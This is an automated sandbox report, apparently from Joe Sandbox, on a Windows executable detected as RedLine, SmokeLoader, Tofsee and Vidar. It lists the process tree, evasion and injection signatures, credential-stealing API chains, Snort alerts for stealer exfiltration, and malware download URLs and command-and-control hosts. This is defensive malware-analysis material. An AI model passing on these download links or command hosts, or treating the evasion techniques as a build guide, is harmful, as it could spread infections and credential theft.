
Windows Analysis Report 9ro85QVN0F.exe

Overview

General Information

Sample Name: 9ro85QVN0F.exe
Analysis ID: 553220
MD5: 4e806c42b23b043fa7409d108eecaadb
SHA1: 39d29853690f371fb690d427d34eace3946b6553
SHA256: 847fd5a4cae442afc596f09b8a8f2de13bc85356dcd8b897a3b4a89081f5046f
Tags: CoinMiner, exe
Detection

RedLine SmokeLoader Tofsee Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Found strings related to Crypto-Mining
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Sample uses process hollowing technique
.NET source code references suspicious native API functions
Changes security center settings (notifications, updates, antivirus, firewall)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Found evaded block containing many API calls
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • 9ro85QVN0F.exe (PID: 6156 cmdline: "C:\Users\user\Desktop\9ro85QVN0F.exe" MD5: 4E806C42B23B043FA7409D108EECAADB)
    • 9ro85QVN0F.exe (PID: 6980 cmdline: "C:\Users\user\Desktop\9ro85QVN0F.exe" MD5: 4E806C42B23B043FA7409D108EECAADB)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 411E.exe (PID: 4256 cmdline: C:\Users\user\AppData\Local\Temp\411E.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 6752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • 53DC.exe (PID: 1740 cmdline: C:\Users\user\AppData\Local\Temp\53DC.exe MD5: 4E806C42B23B043FA7409D108EECAADB)
          • 53DC.exe (PID: 6976 cmdline: C:\Users\user\AppData\Local\Temp\53DC.exe MD5: 4E806C42B23B043FA7409D108EECAADB)
        • E6C4.exe (PID: 6924 cmdline: C:\Users\user\AppData\Local\Temp\E6C4.exe MD5: C94FBEF580C7CD0BA874360D0B997F22)
        • F4CF.exe (PID: 6380 cmdline: C:\Users\user\AppData\Local\Temp\F4CF.exe MD5: 50BADD524B2E3FAF0FF050DD5BE8A584)
          • cmd.exe (PID: 6228 cmdline: "C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\jdijwvkg\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5092 cmdline: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\bzxmernq.exe" C:\Windows\SysWOW64\jdijwvkg\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • FD6B.exe (PID: 6972 cmdline: C:\Users\user\AppData\Local\Temp\FD6B.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • FD6B.exe (PID: 5976 cmdline: C:\Users\user\AppData\Local\Temp\FD6B.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
        • wuapihost.exe (PID: 6700 cmdline: C:\Windows\System32\wuapihost.exe -Embedding MD5: 85C9C161B102A164EC09A23CACDDD09E)
  • svchost.exe (PID: 2224 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6672 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6596 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6580 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4776 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5388 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5020 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 5224 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6956 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 672 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • iscgwer (PID: 6784 cmdline: C:\Users\user\AppData\Roaming\iscgwer MD5: 4E806C42B23B043FA7409D108EECAADB)
    • iscgwer (PID: 6780 cmdline: C:\Users\user\AppData\Roaming\iscgwer MD5: 4E806C42B23B043FA7409D108EECAADB)
  • svchost.exe (PID: 6756 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4848 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.340237120.0000000000530000.00000004.00000001.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000019.00000002.458534378.0000000000650000.00000040.00000001.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
00000018.00000002.406836326.0000000000582000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000018.00000002.406836326.0000000000582000.00000004.00000001.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000000.326990095.0000000004DE1000.00000020.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
(10 entries in total; remainder not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
17.0.iscgwer.400000.6.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
17.0.iscgwer.400000.4.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
22.0.53DC.exe.400000.5.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
22.0.53DC.exe.400000.6.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
17.0.iscgwer.400000.5.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
(18 entries in total; remainder not shown)

Sigma Overview

System Summary:

Sigma detected: Copying Sensitive Files with Credential Data
Source: Process started
Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
Data: Command: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\bzxmernq.exe" C:\Windows\SysWOW64\jdijwvkg\, CommandLine: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\bzxmernq.exe" C:\Windows\SysWOW64\jdijwvkg\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\F4CF.exe, ParentImage: C:\Users\user\AppData\Local\Temp\F4CF.exe, ParentProcessId: 6380, ProcessCommandLine: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\bzxmernq.exe" C:\Windows\SysWOW64\jdijwvkg\, ProcessId: 5092

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://185.7.214.171:8080/6.php | URL Reputation: Label: malware
Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exe | Avira URL Cloud: Label: malware
Source: http://81.163.30.181/2.exe | Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/8474_1641976243_3082.exe | Avira URL Cloud: Label: malware
Source: http://unicupload.top/install5.exe | URL Reputation: Label: phishing
Source: http://81.163.30.181/1.exe | Avira URL Cloud: Label: malware
Source: http://privacy-tools-for-you-780.com/downloads/toolspab3.exe | Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/7729_1642101604_1835.exe | Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exe | Avira URL Cloud: Label: malware
Source: http://81.163.30.181/6236.exe | Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\FD6B.exe | Avira: detection malicious, Label: HEUR/AGEN.1211353
Source: C:\Users\user\AppData\Local\Temp\bzxmernq.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Multi AV Scanner detection for submitted file
Source: 9ro85QVN0F.exe | Virustotal: Detection: 37%
Multi AV Scanner detection for domain / URL
Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exe | Virustotal: Detection: 12%
Source: http://data-host-coin-8.com/files/8474_1641976243_3082.exe | Virustotal: Detection: 16%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\411E.exe | Metadefender: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\411E.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\433C.exe | Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\433C.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\53A8.exe | ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\53DC.exe | ReversingLabs: Detection: 46%
Source: C:\Users\user\AppData\Local\Temp\656C.exe | ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Local\Temp\D54.exe | Metadefender: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\D54.exe | ReversingLabs: Detection: 81%
Machine Learning detection for sample
Source: 9ro85QVN0F.exe | Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\D54.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\iscgwer | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\656C.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\F4CF.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\53A8.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\14F6.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\53DC.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FE11.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\433C.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\411E.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\27E3.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7480.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FD6B.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\bzxmernq.exe | Joe Sandbox ML: detected
Source: 24.3.E6C4.exe.680000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 25.2.F4CF.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 25.3.F4CF.exe.780000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 25.2.F4CF.exe.650e50.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 24.2.E6C4.exe.660e50.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_00407190 CryptUnprotectData,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_006676C0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_00664A80 CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_00667760 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_006673E0 CryptUnprotectData,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_006679F0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

Bitcoin Miner:

Found strings related to Crypto-Mining
Source: svchost.exe, 00000005.00000002.603968353.0000024F8A590000.00000002.00020000.sdmp | String found in binary or memory: XMRig 6.2.2dz\AppData\Roaming\Sysfiles\Driver.exe

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Unpacked PE file: 24.2.E6C4.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\F4CF.exe | Unpacked PE file: 25.2.F4CF.exe.400000.0.unpack
Source: 9ro85QVN0F.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\411E.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.3:49790 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49811 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.3:49874 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49876 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49891 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49918 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49924 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49933 version: TLS 1.2
Source: Binary string: C:\beritu100-kif-hi.pdb | source: F4CF.exe, 00000019.00000000.409125786.0000000000401000.00000020.00020000.sdmp, F4CF.exe.11.dr, bzxmernq.exe.25.dr
Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb | source: 411E.exe, 00000013.00000000.399120089.0000000000413000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.385802310.0000000000413000.00000002.00020000.sdmp, 411E.exe.11.dr
Source: Binary string: C:\coduluvi\vebazomimohey20-dubelat-cudecufoc 51\muzavibow63 r.pdb | source: FE11.exe.11.dr, 433C.exe.11.dr
Source: Binary string: @RC:\jadawac53 buxabalafubiro.pdbh | source: D54.exe.11.dr
Source: Binary string: C:\wufiruy\zoji_batodetumoz97\toboyese.pdb | source: E6C4.exe, 00000018.00000000.402465553.0000000000401000.00000020.00020000.sdmp, E6C4.exe.11.dr
Source: Binary string: _TC:\wufiruy\zoji_batodetumoz97\toboyese.pdbh | source: E6C4.exe, 00000018.00000000.402465553.0000000000401000.00000020.00020000.sdmp, E6C4.exe.11.dr
Source: Binary string: fHSC:\kaya\ginonohu.pdbh | source: 9ro85QVN0F.exe, iscgwer.11.dr, 53DC.exe.11.dr
Source: Binary string: \C:\coduluvi\vebazomimohey20-dubelat-cudecufoc 51\muzavibow63 r.pdb | source: FE11.exe.11.dr, 433C.exe.11.dr
Source: Binary string: C:\beritu100-kif-hi.pdbh | source: F4CF.exe, 00000019.00000000.409125786.0000000000401000.00000020.00020000.sdmp, F4CF.exe.11.dr, bzxmernq.exe.25.dr
Source: Binary string: C:\jadawac53 buxabalafubiro.pdb | source: D54.exe.11.dr
Source: Binary string: C:\kaya\ginonohu.pdb | source: 9ro85QVN0F.exe, iscgwer.11.dr, 53DC.exe.11.dr
Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb | source: 411E.exe, 00000013.00000000.399120089.0000000000413000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.385802310.0000000000413000.00000002.00020000.sdmp, 411E.exe.11.dr
Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Code function: 0_2_00419AC1 GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,SetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_00668A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_006612E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_006614D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_00666090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_00669930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_00669BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_00669D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.3:49889 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49888 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.3:49895 -> 81.163.30.181:80
Source: Traffic | Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:49907 -> 185.163.204.24:80
Source: Traffic | Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.3:49920 -> 81.163.30.181:80
Source: Traffic | Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.3:49921 -> 81.163.30.181:80
Source: Traffic | Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:49930 -> 185.163.204.24:80
Source: Traffic | Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49930 -> 185.163.204.24:80
Source: Traffic | Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49907 -> 185.163.204.24:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe | Network Connect: 188.166.28.199 80
Source: C:\Windows\explorer.exe | Domain query: unicupload.top
Source: C:\Windows\explorer.exe | Network Connect: 185.233.81.115 187
Source: C:\Windows\explorer.exe | Network Connect: 185.7.214.171 144
Source: C:\Windows\explorer.exe | Domain query: host-data-coin-11.com
Source: C:\Windows\explorer.exe | Domain query: privacy-tools-for-you-780.com
Source: C:\Windows\explorer.exe | Domain query: goo.su
Source: C:\Windows\explorer.exe | Domain query: transfer.sh
Source: C:\Windows\explorer.exe | Network Connect: 185.186.142.166 80
Source: C:\Windows\explorer.exe | Domain query: data-host-coin-8.com
Uses the Telegram API (likely for C&C communication)
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /11.msi HTTP/1.1 | Host: 81.163.30.181 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /2.exe HTTP/1.1 | Host: 81.163.30.181 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /1.exe HTTP/1.1 | Host: 81.163.30.181 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /2.exe HTTP/1.1 | Host: 81.163.30.181 | Accept: */*
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:00 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw:
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:05 GMTContent-Type: application/x-msdos-programContent-Length: 320000Connection: closeLast-Modified: Fri, 14 Jan 2022 12:59:01 GMTETag: "4e200-5d58a5df2ed13"Accept-Ranges: bytesData Raw:
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:08 GMTContent-Type: application/x-msdos-programContent-Length: 322560Connection: closeLast-Modified: Fri, 14 Jan 2022 12:59:02 GMTETag: "4ec00-5d58a5df48353"Accept-Ranges: bytesData Raw:
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:45 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw:
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:49 GMTContent-Type: application/x-msdos-programContent-Length: 373760Connection: closeLast-Modified: Wed, 12 Jan 2022 08:30:43 GMTETag: "5b400-5d55e62ba577e"Accept-Ranges: bytesData Raw:
